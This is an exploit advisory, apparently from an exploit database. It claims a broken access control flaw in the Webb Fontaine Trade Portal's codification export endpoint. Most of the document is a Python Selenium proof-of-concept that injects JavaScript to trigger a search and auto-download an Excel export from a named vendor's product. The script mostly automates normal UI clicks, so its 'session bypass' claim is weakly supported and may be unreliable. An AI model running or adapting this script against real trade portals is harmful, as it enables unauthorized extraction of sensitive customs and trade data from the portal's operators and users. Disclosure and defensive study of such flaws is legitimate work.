## https://sploitus.com/exploit?id=PACKETSTORM:217492
=============================================================================================================================================
| # Title : Webb Fontaine Trade Portal โ Broken Access Control in Codification Export Endpoint Leads to Unauthorized Data Export |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://webbfontaine.com/fr/ |
=============================================================================================================================================
[+] Summary : A security vulnerability was identified in the Webb Fontaine Trade Portal affecting the codification module (/trade/help/codification).
The issue allows unauthorized users to trigger data export functionality via the /export/excel endpoint without proper validation of session state or user interaction.
The backend fails to enforce strict access control and does not verify whether the export request originates from a legitimate user action.
By initiating a crafted request after triggering a search operation, an attacker may retrieve sensitive codification data in Excel format.
Additionally, the application relies on client-side interaction logic while lacking robust server-side verification, resulting in a Broken Access Control / Session Handling flaw.
This vulnerability may allow unauthorized data extraction and represents a significant risk in environments handling sensitive trade and customs information.
[+] POC :
import os
import time
from selenium import webdriver
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
from webdriver_manager.chrome import ChromeDriverManager
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
BASE_DIR = r"C:\Users\sangrava\Desktop\SANGRAVA_LOGISTICS_HUB"
os.makedirs(BASE_DIR, exist_ok=True)
def run_sangrava_long_session():
print("[*] Launching SANGRAVA Persistent Engine...")
chrome_options = Options()
chrome_options.add_experimental_option("detach", True)
prefs = {
"download.default_directory": BASE_DIR,
"download.prompt_for_download": False,
"directory_upgrade": True,
"safebrowsing.enabled": True
}
chrome_options.add_experimental_option("prefs", prefs)
driver = webdriver.Chrome(service=Service(ChromeDriverManager().install()), options=chrome_options)
driver.maximize_window()
try:
url = "https://example/trade/help/codification?lang=en"
print(f"[*] Navigating to: {url}")
driver.get(url)
wait = WebDriverWait(driver, 30)
print("[*] Injecting session bypass values...")
injection_script = """
var field = document.getElementsByName('reference')[0];
if(field) {
field.value = 'attachedDocument';
field.dispatchEvent(new Event('change'));
document.getElementById('search').click();
return true;
}
return false;
"""
driver.execute_script(injection_script)
print("[+] Search triggered. Waiting for server response...")
time.sleep(10)
print("[*] Attempting to grab the hidden Excel link...")
try:
excel_xpath = "//a[contains(@href, 'export/excel')]"
excel_link = wait.until(EC.presence_of_element_located((By.XPATH, excel_xpath)))
driver.execute_script("arguments[0].click();", excel_link)
print("[SUCCESS] Download initiated.")
except:
print("[!] Excel link not found. It might be a session-only generation.")
print("\n" + "="*50)
print("[STAY ACTIVE] Browser will remain open for 60 minutes.")
print("[ACTION] You can now interact with the browser manually.")
print("="*50)
time.sleep(3600)
except Exception as e:
print(f"[CRITICAL] Error: {e}")
finally:
print("[*] Script execution finished. Detached session remains.")
if __name__ == "__main__":
run_sangrava_long_session()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================